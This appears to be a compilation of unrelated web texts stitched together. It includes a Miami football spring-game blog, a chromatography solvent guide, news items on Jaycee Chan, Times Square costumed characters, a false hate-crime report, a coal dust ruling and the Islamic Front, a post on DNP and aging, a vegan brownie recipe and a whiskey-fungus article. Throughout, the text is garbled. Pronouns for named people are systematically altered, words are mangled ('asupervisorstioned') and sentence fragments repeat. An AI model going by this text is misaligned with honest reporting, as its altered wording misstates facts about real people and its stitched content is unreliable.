Mark Walton. I think he's the starter out of this group and I don't think it's especially close. Mark Richt recruited Walton to UGA and missed out. Now that they're working together at Miami, I expect big things from both coach and player. Gus Edwards. Still "dances" a bit too much for my liking, but he's the big back who can be the compliment to Walton. They looked really good on Saturday. Joe Yearby. I know I'm gonna get hate for this, since Yearby was the starter and a 1,000 yard rusher last year, but I think he's best suited for a slashing type role, not a workhorse role. On Twitter, I noted Yearby as 2A to Edwards' 2, and I think that's more of a fair placement. He's not a full 3rd, but he's not the starter IMO, either. Trayone Gray . I feel bad for Choc, because in another backfield, they would be #2 or maybe #1. But, here, with the trio ahead of him, he's gonna be a rotation player and maybe return guy. They still have the ability to develop and could be a bigger contributor as a senior, but I don't see many more than the 23 carries for them that they logged in 2015 in this upcoming season.
Blending this current team with recruiting, my other main focus, a question from a loyal SOTU reader:
@breu_brasi @TheStateOfTheU Do you think Homer can jump into the top 4 in the fall? — McKenzie Moore (@McKenzi35248938) April 17, 2016
In a word, no.
Homer, a 4-star recruit from burgeoning powerhouse Oxbridge Academy, is fast, with good hands, nice vision and balance. He's also a 17y/o kid coming into one of the most crowded RB rooms in America.
Walton, Edwards, and Yearby are CLEARLY the top 3 in the rotation. In my opinion, Homer would have to break into the top 3 at RB to avoid a redshirt. For people thinking "Homer can just get carries", my response is "from whom?" Is Homer taking carries from Walton? Nope. From Edwards? Nah. From Yearby? No way. From Gray? MAYBE.
And, like I said in the ranking part, Gray had 23 carries last year. Even if Homer were to get ALL of those carries, it's not enough PT to justify burning their redshirt. Homer probably wants to come in and play as a first-year student. But, I don't see that as happening. Sorry.
Star TE scores 2 TDs on the day
You probably thought you were going to see me write about David Njoku here.
Wrong.
Christopher Herndon was the star TE of the day. They had 6 catches for 76 yards and 2 TDs, which is a solid day, if you were wondering. Herndon showed everything you need to see from a TE: blocking, crisp routes, good hands, and, once they caught the ball, the ability to punish defenders. They ran through 2 defenders on their 1st TD, and they ran over Corn Elder on their 2nd.
I still think Njoku is the better TE because he's a physical FREAK and was the leading receiver at the end of the year, but Herndon isn't far behind him. Look for Miami to utilize the pair together frequently this season.
Defensive Line is a big positive
This is the group that has most clearly benefited from the coaching change. All day long, and all spring long, the DL has been getting up the field and making plays.
This group goes a legit 9 deep, with Al-Quadin Muhammad, Chad Thomas, Demetrius Jackson, and Trent Harris at End, and Kendrick Norton, RJ McIntosh, Courtel Jenkins, Gerald Willis, and Anthony Moten at Tackle. And, that group is hungry, finally playing the 1-gap scheme they're built for, and ready to bring it on every play.
The Orange team defense forces a 3 & out. This No. 1 defense is definitely competing and firing off the ball — J.T. Wilcox (@JTWilcoxSports) April 16, 2016
/nods
/smiles
Offensive Line needs work
It wasn't the prettiest game for the OL, but it wasn't the worst, either. The lines, 1st and 2nd team, both looked more comfortable in the run game than pass protection.
I will readily admit that evaluating OL is not my strong suit. But, when the defense has multiple TFLs, 5 or 6 sacks, and plenty of other disruption, things need to be addressed.
There were a couple players on the OL who were simply overmatched by their defensive counterparts. Hopefully, when Alex Gall and Nick Linder return from injury, the line will take a step forward. That's going to be a key, as their ability to open holes for the run game, and protect the franchise QB will be paramount to the Canes' success in 2016.
Freshman LBs are the truth
While several incoming recruits will benefit from a redshirt, LBs Shaq Quarterman and Mike Pinckney are ready to go RIGHT NOW.
That pair, who started and played the entire game with the 1st team defense, played with high energy and great effectiveness. Quarterman was credited with 7 tackles and a TFL, but I had them closer to 10 tackles on the day. Pickney had 5 tackles and 2 TFLs, and also was a factor in pass defense.
Any uncertainty I had about starting 2 freshmen LBs was erased by what I saw on Saturday. They're not perfect players and will make mistakes, but those are the growing pains you have to go through with young players. But, I think it's pretty clear that the Canes' first team defense is better and stronger with Quarterman and Pinckney on it.
DBs still a weak spot
Jaquan Johnson was a standout on the 2nd team. Their instincts are incredible and they just makes plays. They were probably the best DB on the day for me.
Corn Elder had an up and down day. He's not a #1 corner, but he's being forced into that spot. He's a great #3 corner, even #2. But they struggled against Braxton Berrios for most of the day in coverage. Elder did, however, bring plenty of ferocity in supporting the run, making several big tackles.
Sheldrick Redwine was okay, but not great. Michael Jackson dropped a sure-fire INT on 2nd team on a floater. Ryan Mayes went unnoticed. RS Frosh Robert Knowles switched from S to CB and made a couple plays.  They are thinking at the position, you can see he's a step slow, but they have the physical talent to be pretty good out there in time.
Jamal Carter and Rayshawn Jenkins were shaky at best in tackling situations. Both ended up making a couple nice plays on contested catches, breaking them up. But, there needs to be a steady level of play at Safety that wasn't present on Saturday.
Long story short: the more pressure the front 7 can bring to help the secondary, the better.
Other thoughts
Just a couple quick hitters:
Stacy Coley is going to have a big year. They sat out this game, but it's clear he's the #1 receiver here. The offense will benefit from their return from a hamstring injury in the fall.
Incoming WRs will play, too. Sam Bruce, Dionte Mullins, Ahmmon Richards , and JUCO Dayall Harris will play "if they're ready", according to CMR. With low numbers at WR (2nd team offense had to play walk-ons opposite Darrel Langham the whole day), the infusion of talent from the asupervisorstioned 4 players will be a welcomed sight come June. CMR also said those 4 players could factor in the return game.
, and JUCO will play "if they're ready", according to CMR. With low numbers at WR (2nd team offense had to play walk-ons opposite the whole day), the infusion of talent from the asupervisorstioned 4 players will be a welcomed sight come June. CMR also said those 4 players could factor in the return game. Former players were back on the field and it was awesome. Early in the game, there were maybe 100 former players in the NE endzone, taking in the game. As the game got to halftime and early in the 2nd half, that group had grown to 200+, easily. Bringing back former players is something that should have been done a while ago, and I'm elated that CMR and staff have welcomed them back.
There were PLENTY of recruits on hand. I saw 20+ from Chaminade-Madonna. Another 15-20 from St. Thomas Aquinas. And, there were top tier recruits like 5-star RB Stephen Carr , 4-star RB Darrian Felix , 4-star S Xavier McKinney . Commits N'Kosi Perry, Cade Weldon, and Gilbert Fierson (2018) were on hand as well. And PLENTY more. I'd estimate a solid 125-ish recruit were on hand for the Spring Game. They got a good show, IMO.
Lawrence Cager and David Njoku both had 2 drops on the day. Easy, wide open drops, too. Can't have that.
both had 2 drops on the day. Easy, wide open drops, too. Can't have that. Braxton Berrios had a really nice day. They and Malcolm Lewis both made some tough catches over the middle.
Backup QB is still unsettled. Malik Rosier got the first crack at things for their team, but Evan Shirreffs, Jack Allison , and Vincent Testaverde all played as well. None of those 4 QBs really looked all that good, and each made plays that left much to be desired. Let's just say this group has a lot of work to do.
, and Vincent Testaverde all played as well. None of those 4 QBs really looked all that good, and each made plays that left much to be desired. Let's just say this group has a lot of work to do. Both sides of the ball were pretty vanilla with their play calling. That's typical of a Spring Game. Save the surprises for the Fall.
The weather was beautiful until the very end of the game, when clouds rolled in. Luckily, the rain skirted Lockhart stadium and the spring game went off without a hitch.
Those are my thoughts. Share yours in the comments section below.
Go Canes
*Columns Week: Just Add Solvent*
The solvents used in flash chromatography are generally polarized, small, and cheap. Rfs are primarily driven by structure-independent electrostatic interactions (H-bonds, dipole-dipole, etc.), and solvent specific steric interactions rarely come into play [1]. This means that solvents (mixtures) of equal polarity are interchangeable, making the solvent system of a column somewhat arbitrary. In industry, solvents are generally selected for a mixture of low cost and low toxicity, while academic labs are more influenced by ease of use and idiosyncratic factors [2].
In my work, three binary mixes have been sufficient for the large majority of compounds:
1) Hexanes/Ethyl Acetate
The workhorse for most student chemists, this mixture is very good for non-polar compounds that are stable to at least 80℃. Effective mixtures range from 0.5% EtOAc all the way to pure EtOAc, with a 7:3 mixture inexplicably giving an Rf of around 0.3 for at least half of my compounds.
2) Dichloromethane/Methanol
This system is more effective for polar compounds and compounds with poor solubility in ethyl acetate. Most compounds lacking a free amine work well in the 2-20% MeOH range, which corresponds roughly to 20-60% EtOAc in hexanes. Mixtures containing less than 10% MeOH should be prepared fresh each column volume, as methanol and dichloromethane are azeotropes. Evaporation of dichloromethane will rapidly reduce the effective concentration of MeOH if mixtures are left to stand.
3) Petroleum Ether/Diethyl Ether
Both of these solvents boil at or around 40℃ at atmospheric pressure, which makes this a perfect system for substances too heat sensitive for the rotovap. Both also have high vapour pressures, and can be either removed at atmospheric pressure with a streme of nitrogen, or rotovapped with a room temperature water bath.
Gradients
A standard, constant binary solvent works very well when two compounds of roughly similar polarity need to be separated. But, it's inefficient when there's a large difference in Rfs (ex. 0.3 vs 0.9), an dhas poor resolving power when there are four or more compounds in the sample. Solvent gradients are the answer.
The quick and easy version is to run your first column volume at an extremely low polarity, such as 98:2 hexanes:ethyl acetate or pure dichloromethane. Your compound of interest shouldn't move, but most common non-polar contaminants will fly through (ex. Excess equivalents of protecting groups). From there, run one CV at a mixture that gives your compound of interest an Rf of 0.3, and one CV at Rf=0.5. By the end of the third CV your column should be finished [3].
The more methodical gradient column approach is to always use mixture in which your least polar compound has an Rf of 0.3. Designed for identifying low-concentration side products, this will probably require an hour or more and forty or so test tubes, but will allow a detailed understanding of your reaction.
Minor Additions
Acids and bases tend to move through flash silica poorly, often eluting in frustrating streaks fifteen or more fractions long [4]. This stems from their ability to transfer protons back and forth across either the flash silica or other compounds on the column. As would be expected, the resulting ions have negligible Rf values in all but the most powerful of solvents, and are essentially fixed in place until a subsequent proton transfer.
The solution is to add in a small (<2%) quantity of sacrificial acid or base, as the case may be. These act by preventing deprotonation/protonation of your compound of interest, and are essential whenever your compound has a free carboxylic acid or primary/secondary/tertiary amine.
Acetic acid is the most common proton source, while either ammonium hydroxide or triethylamine serve as bases. Of the latter two I prefer triethylamine, for its facile solubility in non-polar solvents. All three are easily removed under high vacuum, and have only a minor impact on TLC staining solutions [5].
—————————————————————————————————-
[1] Aromatic solvents like toluene can show minor Rf variations as a result of pi stacking, etc., but I've never heard of the difference being significant.
[2] Ie. “that's how the last grad student/post doc did it.”
[3] This 0.3 to 0.5 switch is designed reduce the number of fractions containing your compound of interest. If you are confident that no more-polar impurities are present I'd recommend switching to a 0.5 Rf once your compound starts eluting, whether or not you're running a gradient column.
[4] Note: A streaking compound does not mean that it is an acid or a base. Silica is weakly acidic, and suscetible compounds may decompose on the column (or TLC plate). If you suspect compound degradation run a 2D TLC plate (off diagonal spots indicate decomp.), and add ~2% TEA to the column when slurry packing.
[5] Acids/Bases are just as important in the TLC pot. Triethylamine will stain in ninhydrin, but generally the background is faint enough that there's no trouble locating your amine of interest. I haven't extensively tested ammonia, though if you are having trouble it could likely be removed by heating the plate prior to dipping in the staining solution (that works for pyridine, at any rate).
BEIJING (Reuters) - Chinese prosecutors have approved last month's arrest of Jaycee Chan, son of kung fu movie star Jackie Chan, after a suspected drugs offence, the state-owned Beijing News reported on Wednesday, meaning they can now be formally charged.
Taiwan movie star Kai Ko, also known as Ko Chen-tung, attends a news conference after being released from a two-week detention by Beijing police, in Taipei August 30, 2014. REUTERS/Pichi Chuang
The younger Chan, a 32-year-old actor and singer, was arrested in Beijing after testing positive for marijuana and police said they found 100 grams of the drug at their home.
President Xi Jinping said in June that China would “harshly crack down” on narcotics, state media reported.
Action and comedy star Jackie Chan, 60, served as a goodwill spokesperson for the China National Anti-Drug Committee in 2009, state media reported, promoting anti-drug education.
China has detained a string of other mostly B-list celebrities in recent months on drug-related charges, cases that have been publicized widely in both state and social media. They have included movie and television stars, film directors and a prominent screenwriter.
Drug-related crimes carry harsh penalties in China including death or life imprisonment in serious cases.
A lawyer told the Beijing News the younger Chan, if found guilty, could be jailed for about three years.
Illegal drugs, especially synthetic substances like methamphetamine, ketamine and ecstasy, have grown in popularity in China in tandem with the rise of a new urban class with greater disposable income.
A commentary published Wednesday in the Global Times, a popular tabloid published by the official People's Daily, said celebrities should not expect leniency from the government or the public after sex or drug scandals.
“Western celebrities like Kobe Bryant and Hugh Grant were embraced by fans again after they were hit by scandals, causing an illusion among Chinese entertainers that they could be as lucky as Bryant and Grant,” the commentary said. “However, Chinese entertainment figures are subjected to higher standards of morality than their Western counterparts.”
Film director Wang Quan'an was detained on Monday on suspicion they solicited prostitutes.
The NYPD is making good on its pledge to rid Times Square of its costumed super-zeroes — busting four more menaces in just 30 minutes over the weekend.
Two Iron Men, a Spider-Man and an Elmo were accused of blocking pedestrians, while Spider-Man also grabbed a passerby to pose for a picture, cops said.
The busts came just hours after cops started handing out fliers telling visitors to the Crossroads of the World that they don't have to pay for photos.
The four rogue characters were charged with disorderly conduct late Saturday, with “Spider-Man” William Suarez, 32, also charged with aggressive panhandling for allegedly laying their hands on a potential mark.
Suarez, “Iron Man” Javier Hernandez, 37, and “Elmo” Jose Maria, 25, were all locked up pending arraignment, while the other “Iron Man,” Khalid Lahmadi, 40, was released with a summons.
The crackdown followed Saturday's police distribution of fliers in several languages that said, “Photos with costumed characters are free. Tipping is optional.”
Two uniformed cops continued spreading the message Sunday, approaching tourists and saying, “You don't have to pay,” after they took snapshots with cartoon copycats.
Carlos Oliveira, 40, of Richmond, Va., said that despite the NYPD's efforts, a man dressed as the Statute of Liberty demanded $5 after posing with Oliveira's kids, Nicholas, 8, and Geovanna, 5.
Oliveira called that amount “too much” and instead gave $2 to someone dressed as SpongeBob SquarePants, who also posed with their children.
“There aren't that many things for kids to do in Times Square, so this was a fun thing for them,” they said. “As soon as we got here, they wanted to take photos.”
Many of the panhandlers are Hispanic immigrants, and Lucia Gomez, head of the immigrant-rights group La Fuente, stopped by Times Square Sunday to take photos and video of the cops in action.
Gomez said they were contacted by several costumed characters last week and was holding a series of meetings to try to organize them and help shape any potential legislation.
BPM MEDIA A Muslim woman has been fined for lying to police about being attacked for wearing a hijab
The 18-year-old student, known only as Miss Choudhury, said they were violently shoved from behind and punched in the face by a man in Birmingham city centre 10 days after the atrocities in the French capital on November 13. The teenager told detectives they thought they were targeted on November 23 because they were wearing Islamic headwear. But police, who treated it as a hate crime, found no evidence of the attack after spending hours trawling through CCTV footage in and around New Street where the assault allegedly took place.
The woman was given a £90 fine for wasting police time after officers even accompanied them to the scene to retrace their steps. Miss Choudhury said they were too scared to walk alone after the made-up attack and claimed Muslims were being targeted after the atrocities in the French capital.
BPM MEDIA The teenager claimed they were punched 10 days after the Paris attacks
They said: "I feel shocked and really scared that someone could attack you for no reason. "I don't feel safe at all now. "I was walking to the train station to meet some friends when someone shoved me from behind. "When I turned around they punched me in the face and then just went off.”
There is no evidence they were physically assaulted Superintendent Andy Parsons
They added: ”I was really upset afterwards. "I can only think it was because they saw my hijab as they didn't take my bag or anything.” Speaking of the Paris attacks, Miss Choudhury said: "It's made life harder for innocent Muslims. "We don't want people to be killed, that's not our religion. Our religion is all about peace. "My parents are so scared that they're telling me to take my hijab off.”
BPM MEDIA The woman, known only as Miss Choudhury was fined £90 for wasting police time
Superintendent Andy Parsons, from West Midlands Police, said: "Detectives spent countless hours looking through footage from the network of city centre CCTV cameras in a bid to piece together what happened. "The footage shows them walking normally along New Street and at no stage do they appear in distress or seen reacting to anything. "There is no evidence they were physically assaulted and they were given a penalty notice for wasting police time."
BPM MEDIA Police spent hours searching through CCTV footage after the woman reported the crime
In 1954, Denham Harman proposed the free radical theory of aging (FRTA), which posits that the accumulation of lipid, protein, and nucleic acid damage from free radicals results in a decline of function over time. Although the FRTA is one of the leading theories on aging today, it is still being modified. One major breakthrough was the identification of mitochondria as the major source of oxygen free radicals, such as superoxide and hydroxyl radical, and other reactive oxygen species (ROS), like hydrogen peroxide.
Support for the FRTA includes a decrease in ROS production in calorie restricted (CR) animals, a dietary strategy known to increase lifespan in a whole host of animals. A hot area of research is the search for calorie restriction mimetics, which mimic the lifespan extending effects of CR. By using CR mimetics therapeutically, we may be able to have lower cholesterol, blood glucose, and blood pressure, as well as lower instances of cancer, diabetes, neurodegeneration, and heart disease — and still be able to eat a hot fudge sundae every night.
Caldeira da Silva and Cerqueira suggest that mitochondrial uncoupling is an effective mimic of CR. In mitochondria, the electron transport chain uses electrons from glucose and lipids to pump protons across a membrane. This proton gradient can be used to make energy in the form of ATP through oxidative phosphorylation. The process is kind of like generating hydropower. Uncouplers work by putting a leak in the dam, which lets water through without going to the generator. They “uncouple” the electron transport chain from oxidative phosphorylation, thus reducing the efficiency of energy production. Although animals have uncoupling proteins (these proteins are important for thermogenesis, especially during hibernation), so far there are no known agonists. The researchers instead used low doses of the mitochondria uncoupler DNP. DNP was actually used as a diet pill because the body makes up for inefficient energy production by burning more fat. Unfortunately, all that potential energy in the proton gradient is released as heat, which can cause fatal fevers. (The FDA deemed DNP unfit for human consumption in 1938, although supplements are now sold online to bodybuilders).
Notably, the mice in the study had no change in body temperature. They were given doses 1000X below the lethal dose and plenty of space to let off any extra heat. The DNP treated mice ate the same amount of food as control mice but had lower body mass. The DNP treated mice showed many phenotypes observed in calorie restricted mice. Like CR mice, DNP treated mice had higher rates of respiration with lower production of ROS. These mice also had lower oxidative damage to their DNA and proteins, another hallmark of CR. They showed lowered blood glucose, lower triglycerides, and lower insulin. Most importantly, DNP treated mice showed an extended lifespan. This study suggests that mitochondrial uncouplers are an effective mimic of calorie restriction and might be a realistic therapeutic intervention for delaying aging and extending lifespan. Uncouplers may be even more effective than resveratrol, which may – or may not – only work on mice on a high fat diet.
Advertisements
Lorde has come under fire after comparing their friend Taylor Swift to an “autoimmune disease” in an interview with The Guardian on Saturday.
Speaking on the difficulty of maintaining a close friendship with someone as famous as Swift, 27, Lorde told The Guardian, “It's like having a friend with very specific allergies. There are certain places you can't go together. Certain things you can't do.”
Get push notifications with news, features and more.
“There are these different sets of considerations within the friendship,” Lorde continued. “It's like having a friend with an autoimmune disease.”
didn't mention taylor, but regardless, i fucked up & that was really insensitive. i'm sorry 🌹 — Lorde (@lorde) June 20, 2017
After a fan mentioned how fellow Swift friend Selena Gomez might (who suffers from lupus) feel about the disease comment, Lorde apologized on Twitter, writing, “didn't mention taylor, but regardless, i f—– up & that was really insensitive. i'm sorry.”
Jeff Kravitz/AMA2014/FilmMagic
The two musicians are close friends, with Swift throwing Lorde a 20th star-studded birthday party in November.
“Had the best birthday party I've ever had tonight surrounded by my nyc family. all organised by tay who is as they says ‘a mom with no kids'. i am ur kid and u love me so hard i could burst. here's to our 3 magic years of the best friendship and more moments like this squished between angels,” the singer wrote in an Instagram photo of herself, Swift and model Karlie Kloss.
FROM PEN: Grammy News and Notes: Album of the Year Nominees
A bunch of stars turned out for the singer's bash, including Aziz Ansari, Lena Dunham, Tavi Gevinson, Kloss, Jack Antonoff and Mae Whitman.
Ahead of the party, Swift penned a sweet tribute to their friend which they posted on Instagram.
“Thank you for the music you make, the advice you give, the thoughts you provoke, and the way you've made my life more beautiful since the first day we met up in New York and ate burgers on a park bench and got attacked by squirrels. I. Love. You. So. Much. Ella,” Swift captioned an Instagram photo showing a water-painted birthday card for the Lorde (whose real name is Ella Yelich-O'Connor).
A federal appeals court upheld the government's new coal dust exposure rule for coal miners Monday, rejecting industry challenges to it.
The Court of Appeals for the Eleventh Circuit said the Labor Department's Mine Safety and Health Administration (MSHA) followed the relevant laws in writing the 2014 rule to limit coal dust exposure, which causes black lung disease.
ADVERTISEMENT
“We conclude that MSHA's decades-long effort, culminating in the publication of this rule, adequately took into account the scientific evidence of record and arrived at conclusions which, given MSHA's expertise, are worthy of deference,” a three-judge panel of the Atlanta-based court wrote.
“We therefore deny the petitions for review.”
In a pair of lawsuits, various coal industry representatives said that the regulation did not properly take into account the scientific body of evidence, which the industry said shows it would not result in nearly the health benefits the government claims.
Mining companies also said the MSHA did not properly consult with the Department of Health and Human Services in writing the rule, which the court rejected as well.
Murray Energy Corp., which labeled the rule as part of the Obama administration's multi-pronged “War on Coal,” said it will continue to fight the regulation.
“Murray Energy Corp. is totally committed to the best possible health and safety of our miners, but [MSHA's] disastrous respirable dust rule does not improve their health or safety, is clearly illegal, is technologically infeasible, and will destroy thousands of coal mining jobs with absolutely no health or safety benefit whatsoever,” spokesperson Gary Broadbent said.
The company believes the ruling is “disastrous,” and will appeal the decision to the full court for its review.
The first phase of the rule, restricting allowable coal dust exposure levels, took effect in August 2015. The MSHA said 99 percent of mines had complied as of August 2015.
On Feb. 1, another phase will take effect, mandating that miners wear dust monitors. The final phase, with another stepdown in the dust exposure level, is due to take effect Aug. 1.
While denying rumors of a purported meeting between the US and the newly formed Islamic Front, a Syrian jihadist group that cooperates with al Qaeda's branches in Syria, US Secretary of State John Kerry said today that such a meeting is possible. From Reuters:
“The United States has not met to date with the Islamic Front but it's possible it could take place,” Kerry told a news conference in Manila where they are visiting. “There is an effort afoot among all of the supporting nations of the Syrian opposition to want to broaden the base of the moderate opposition and broaden the base of representation of the Syrian people in the Geneva two negotiation,” they added.
Meanwhile the Islamic Front was also busy denying it met with US officials. And a member of the “political bureau” said that the group would not fight al Qaeda. From Asharq Al Awsat:
Meanwhile, an official of the Islamic Front's political bureau, Abdallah Al-Hamawi, denied the reports and said they were “lies, and their objectives were clear, and we will not allow them to cause sedition”. They added on their Twitter account that the Islamic Front “will not fight the al Qaeda organization because it [Islamic Front] was founded to form a link for jihadists”, and that it would not fight a proxy war or cause division between the jihadists.
Take all of that in, and then go read Thomas Joscelyn's report on Abu Khalid al Suri (or Mohamed Bahaiah), a senior leader of Ahrar al Sham, a large brigade in the Islamic Front that routinely fights alongside al Qaeda's branches in Syria. Bahaiah previously served as Osama bin Laden's courier and now serves as Ayman al Zawahiri's personal representative in Syria (he is mediating a dispute between the leaders of the Islamic State of Iraq and the Sham and the Al Nusrah Front).
Should the US consider the Islamic Front to be part of what Secretary Kerry calls the “moderate opposition”?
Bill Roggio is a Senior Fellow at the Foundation for Defense of Democracies and the Editor of FDD's Long War Journal.
Are you a dedicated reader of FDD's Long War Journal? Has our research benefitted you or your team over the years? Support our independent reporting and analysis today by considering a one-time or monthly donation. Thanks for reading! You can make a tax-deductible donation here.
Such a remarkable story could only happen in the midst of the Israeli-Palestinian conflict. A young gay Palestinian man, who is in grave, life-threatening danger and cannot return to their home with their Israeli partner, was saved by a stranger who came to their aid – a religious West Bank settler.
The Palestinian, T., and the Israeli, Doron, became a couple 10 years ago. Eight years ago, they drafted a marriage agreement between them, but this did not help on the bureaucratic side. T. is tormented: The State has yet to authorize family unification with Doron. As a result, they have yet to receive permanent authorization to live in Israel . They do not have health insurance, a bank account, or a drivers' license. Nor can they take out a mortgage.
"We live in a difficult reality," said Doron on Tuesday. "It's been many years that they are checking them out, but they haven't done anything wrong. T. is a goody-two-shoes."
Recently, T.'s father, who lives in a West Bank village, fell ill, and their son wanted to go visit him. Because going to the village is life-threatening for them because residents there are not willing to accept their sexual orientation, a father-son meeting was held outside of the village.
About ten days ago, T. entered the West Bank via one of the checkpoints. Their sick father, accompanied by their mother, waited for them a short distance from the checkpoint. It was an emotional meeting. The family members finally got to see one another and T. gave them a sum of money that they had been saving for them.
However, following the brief meeting, all started to go wrong. T. started making their way back to Israel, but was surprised to discover at the checkpoint that they were not allowed re-entry. Even though they are currently under consideration for family unification and despite the fact that a yearly temporary residence permit was authorized for him, it was decided not to allow them back into Israel for security considerations.
T. found themselves in an impossible situation: they were not allowed to return to their home in Israel, but returning to their parents' home in the village would put their lives in danger. Left with no other choice, they turned to the only person they knew in the area who could help them – a religious settler who has known them for some years. The man decided to give asylum to T. even though they knew it would not be looked upon favorably in the settlement.
So, this is how it came to be that T., a gay Palestinian, has been hiding out in the home of a religious Jewish family in a settlement.
Looking for a reason
"I can't go back to my home in Israel; I can't enter the village. The only option left for me is to hide out in a settlement, in a home that accepts me in a humane way," said T. on Tuesday.
T. has been trying to get back home for the past 10 days: "They took my residence permit. At first they told me, 'It got lost. Come back tomorrow and we'll find it.' Later they said to me: 'You need to submit a new application for a permit.' On Tuesday they said: 'Go to the Palestinian District Coordinating Office and ask them for a permit.'
"On Wednesday, they asked me to show up in Palestinian court and to bring a declaration that the permit was lost. I brought them all the documentation, but every day they say, 'Come back tomorrow.' I already don't know where to put myself. Every day I arrive at the checkpoint, wait many long hours, and when my turn finally comes up, they tell me, 'Go home.' I'm lucky that they have agreed to host me in the settlement."
The Association for Civil Rights in Israel has already contacted the defense establishment and other government officials on the issue, but has failed to receive a clear explanation on the reason for T.'s detainment. Following questions submitted to the defense establishment, T. was summoned for a hearing to establish whether they can be allowed to return to Israel.
T. also asked for help: "My situation is unusual. I can't return to my village. All I want is to return home."
The Defense Ministry reported that the reason for barring T.'s entry into Israel is security-based.
‘Queer and Transgender Representation, and the Queering of Language in the Works of David Foster Wallace: So What [is] the Exact Pernt to that Like [?]' by Matthew Alexander, as part of a special issue of The Luminary – an open access journal, based at Lancaster University's Department of English and Creative Writing.
The North West Gender Conference 2014
Constructions of Gender in Research
Issue 5: Winter 2014
ISSN 2056-9238 (online)
The second annual North West Gender Conference was held at Lancaster University on 22nd April 2014. The conference was attended by 80 postgraduate students from across the UK who came together to discuss gender in a variety of contexts. This special issue of The Luminary contains a selection of conference papers which were submitted for publication. The diversity of the papers highlights and reflects the range of research areas that were represented at the conference.
Read online by following this link or download the NWGC Special issue pdf.
Advertisements
Easy Vegan Avocado Brownies (Made in a Blender!)
Easy vegan avocado brownies might sound like vegan voodoo-witchcraft, but these are the real deal! Imagine the creamiest brownies you've had, but cranked up another 5 notches.. those are these vegan avocado brownies! Even better, banana is used to help reduce the amount of sugar, without sacrificing flavor. Win win!
Easy Vegan Avocado Brownies, for the Win!
I know what you're thinking: “Avocados in a brownie? This dude has lost their mind!”
Don't knock it 'till you try it, Carol!
(I hope someone named Carol just freaked out!)
Haha! All joking aside, these secretly healthy brownies could fool the most devout choco-holic (me included!).
They're:
Ooey,
Gooey,
Moist,
Chocolatey-to-the-max,
Goodness
Seriously, words cannot describe the perfection of these brownies! They are exactly what I've been dreaming of after all these years as a vegan.
Customizable Taste for Everyone
First, I want to start by saying: NO! You don't taste the avocado or banana in this recipe. I want brownies that taste like chocolate, not produce!
Furthermore, my boyfriend is really sensitive to sweets. Anything overly-sweet (in their opinion), results in a raging headache that I get to hear about for the rest of the night (*sigh*). I, on the other hand, could eat pure sugar with a spoon and be craving it for a week. Neither situation is ideal!
For these reasons, I love experimenting to find the perfect balance of sweetness. These vegan avocado brownies hit the nail on the head!
They're sweet enough that you know you're eating a brownie, but balanced enough so I don't hear any complaints about headaches. Yippee!
My secret weapon? Over-ripe bananas! They're bursting with plant-based sweetness, so the addition allows me to cut back on other sugars.
That being said, if you're one that loves super-sweet desserts, you can omit the banana in place of more sugar. Although, since you can't taste the banana to begin with, I'm not sure why anyone would want to..
Vegan Avocado Brownies for Every Occasion!
I've said it before, I'll say it again: Shareable food is the best kind of food!
I actually made these brownies for a friend's birthday! Unfortunately, they were so good that Cameron and I ate them all before sharing. (Sorry, Jessi! I'll make another batch just for you 😘)
That being said, these vegan avocado brownies are the perfect party treat. Easy to make, store, travel with, and disappear, these brownies are the best party dessert imaginable! Trust me, bring a pan to your next vegan get-together and you'll leave with an empty tray. Talk about easy clean-up! 😉
Nick @ ServingRealness.com Serves 15 Brownies 52 Easy Vegan Avocado Brownies (Made in a Blender!) 10 minPrep Time 20 minCook Time 30 minTotal Time Save Recipe Print Recipe My Recipes My Lists My Calendar Ingredients 1 medium-sized ripe avocado, skin and pit removed
1 banana, peeled
1/2 cup non-dairy milk
1/2 cup all-purpose flour
1/2 cup whole wheat flour
1/2 cup sugar (preferably raw, coconut, or date)
1/2 cup cocoa powder
1 teaspoon baking soda
1/2 teaspoon salt
1-2 tablespoons non-dairy milk (as needed)
For Decoration 2-3 Tablespoons nut butter (the smoother the better!) Instructions Preheat oven to 350°F Blend the avocado, banana, and milk in a blender until smooth Whisk the dry ingredients in a separate large bowl Pour the wet into the dry ingredients and stir with spatula until evenly mixed Add 1-2 tablespoons of milk as needed to reach desired consistency Spread batter evenly into a 8x11-ish glass dish, either greased or lined with parchment paper Bake for 20-25 minutes until a toothpick is removed cleanly from center Allow to cool completely before attempting to decorate or cut To Decorate I simply squeezed smooth almond butter on the tops using a piping bag. Similarly, you can cut a small hole in a zip-lock bag for the same result. Notes Store these babes sealed in the refrigerator for up to two weeks Nutrition Calories 52 cal Fat 2 g Carbs 7 g Protein 2 g Click Here For Full Nutrition, Exchanges, and My Plate Info 7.8.1.2 67 Nick Abell
Love Pinterest as Much as I Do?
Give us a follow to see all the delicious vegan goodness we're serving!
Photos by Danielle Atkins.
If there's a downside to whiskey, it's in Shively, Kentucky.
A low-income suburb of Louisville, Shively is home to five whiskey distilleries and one of the nastiest cases of whiskey fungus in America. Driving down its residential streets, you'll notice that just about everything is covered in an ugly black patina: houses, cars, swing sets, street signs, fire hydrants, and even trees. Some people clean it off every few months with industrial-strength soap and a pressure-washer, but others quit this Sysiphean task long ago, surrendering their outdoor possessions to the unsightly black stuff that always seems to grow back.
Whiskey fungus known as Baudoinia grows on a stop sign across the street from a barrel-aging warehouse. Photos by Danielle Atkins.
For years, the residents of Shively took this black soot as a given. They didn't know it was a preventable fungus caused by the nearby whiskey distilleries and they didn't make much of a fuss about it. It was just another neighborhood complaint that wasn't getting addressed by the local councilmen.
That changed in 2007, when University of Toronto mycologist James Scott published an academic paper about the fungus, which got attention not only for re-naming and re-classifying it based on DNA analysis, but also for pinning it on the whiskey industry. Dr. Scott discovered that this fungus—which they named Baudoinia, after the man who first studied it in 1872, Anton Baudoin—feeds on the ethanol vapor released by liquor as it ages. (Not surprisingly, you'll find Baudoinia near scotch, brandy, and rum distilleries as well, since they also off-gas ethanol.)
Homes in Shively, Kentucky covered in Baudoinia.
Dr. Scott's discoveries were the subject of a 2011 Wired article, which was responsible for making whiskey fungus go mainstream and bringing it to the attention of local residents.
When they heard that the black stuff in their neighborhood was likely the same fungus, Shively resident Joe Billy contacted William F. McMurry, a personal-injury lawyer in Louisville. Billy remembers how surprised they were when they first found out about Baudoinia. "Before the articles came out, I blamed it on the community garden," they tell me. "No one had any idea." Within a few months, they filed a class-action suit against the three major distilleries near Shively—Diageo, Brown-Forman, and Heaven Hill—claiming that they were negligent and responsible for the town's property damage.
Joe Billy, a plaintiff in the class-action suit, stands next to their car covered in whiskey fungus.
